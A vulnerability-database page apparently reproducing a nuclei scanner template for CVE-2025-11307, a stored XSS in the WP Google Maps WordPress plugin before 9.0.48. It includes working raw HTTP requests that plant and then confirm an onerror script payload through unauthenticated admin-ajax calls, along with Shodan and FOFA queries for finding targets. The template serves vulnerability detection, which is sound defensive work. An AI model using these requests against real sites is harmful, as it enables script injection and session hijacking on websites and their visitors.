Lucene search
K

WP Google Maps < 9.0.48 - Cross-Site Scripting

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Stored XSS in WP Google Maps before 9.0.48 via unsanitized AJAX; attackers can execute scripts.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-11307
11 Nov 202508:35
circl
CNNVD
WordPress plugin WP Go Maps 安全漏洞
11 Nov 202500:00
cnnvd
CVE
CVE-2025-11307
11 Nov 202506:00
cve
Cvelist
CVE-2025-11307 WP Google Maps < 9.0.48 - Unauthenticated Stored XSS
11 Nov 202506:00
cvelist
EUVD
EUVD-2025-74048
11 Nov 202506:30
euvd
NVD
CVE-2025-11307
11 Nov 202506:15
nvd
Patchstack
WordPress Google Maps plugin <= 9.0.47 - Unauthenticated Stored Cross-Site Scripting vulnerability
17 Nov 202522:12
patchstack
Positive Technologies
PT-2025-46300
11 Nov 202500:00
ptsecurity
RedhatCVE
CVE-2025-11307
12 Nov 202506:59
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2025-11307
4 May 202600:00
vulncheck_kev
Rows per page
id: CVE-2025-11307

info:
  name: WP Google Maps < 9.0.48 - Cross-Site Scripting
  author: 0x_Akoko
  severity: high
  description: |
    WP Google Maps WordPress plugin < 9.0.48 contains a stored XSS vulnerability caused by unsanitized user input in AJAX actions, letting unauthenticated attackers execute scripts via stored payloads.
  impact: |
    Unauthenticated attackers can execute arbitrary scripts in users' browsers, leading to session hijacking or defacement.
  remediation: |
    Update to version 9.0.48 or later.
  reference:
    - https://wpscan.com/vulnerability/f5b21a05-7a51-4530-9e07-4700f00eeca3/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-11307
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2025-11307
    epss-score: 0.01939
    epss-percentile: 0.77685
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: wpgmaps
    product: wp-google-maps
    shodan-query: http.html:"wp-google-maps"
    fofa-query: body="wp-google-maps"
  tags: cve,cve2025,wp,wordpress,wp-plugin,xss,cache-poisoning,vkev

flow: http(1) && http(2)

variables:
  cache_key: "{{randstr}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wpgmza_store_nominatim_cache&query={{cache_key}}&response=[{"display_name":"<img src=x onerror=alert(document.domain)>","lat":"37.5665","lon":"126.9780","boundingbox":["37.4","37.7","126.7","127.1"]}]

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{\"success\":1}")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=wpgmza_query_nominatim_cache&query={{cache_key}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "<img src=x onerror=alert(document.domain)>", "display_name")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100fc5a65734794f5d78027dc925cbab08e3b275caf29a3be980b09140d61d1408a022100e8dae3750574afb45fdb97f4542b337745c89f323a149906714be298cf073855:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.18.8
EPSS0.01939
SSVC
13